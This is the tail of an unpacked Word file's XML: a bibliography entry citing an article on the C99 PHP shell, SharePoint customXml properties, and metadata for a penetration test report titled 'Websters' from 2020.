            <b:Last>Keane</b:Last>
            <b:First>Justin</b:First>
            <b:Middle>C. Klein</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>PHP Malware C99 Shell</b:Title>
    <b:InternetSiteTitle>madirish.net</b:InternetSiteTitle>
    <b:Year>2001</b:Year>
    <b:Month>November</b:Month>
    <b:Day>30</b:Day>
    <b:URL>http://www.madirish.net/241</b:URL>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{12100911-3457-4407-B040-A894C80ED8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D893E51-F87B-4C4E-906C-6A8FD87AD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BE6E9A4-31E6-4619-9863-EF2E694BA425}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{02A08287-0318-4E87-9275-D189C8DF6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24</Pages>
  <Words>2078</Words>
  <Characters>1184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enetration Test Report</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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tration Test Report</dc:title>
  <dc:subject>Websters</dc:subject>
  <dc:creator>saumya rastogi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>1469333</cp:lastModifiedBy>
  <cp:revision>440</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-23T10:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-31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9CE30196E9B445A1C2C642085D5337</vt:lpwstr>
  </property>
</Properties>
</file>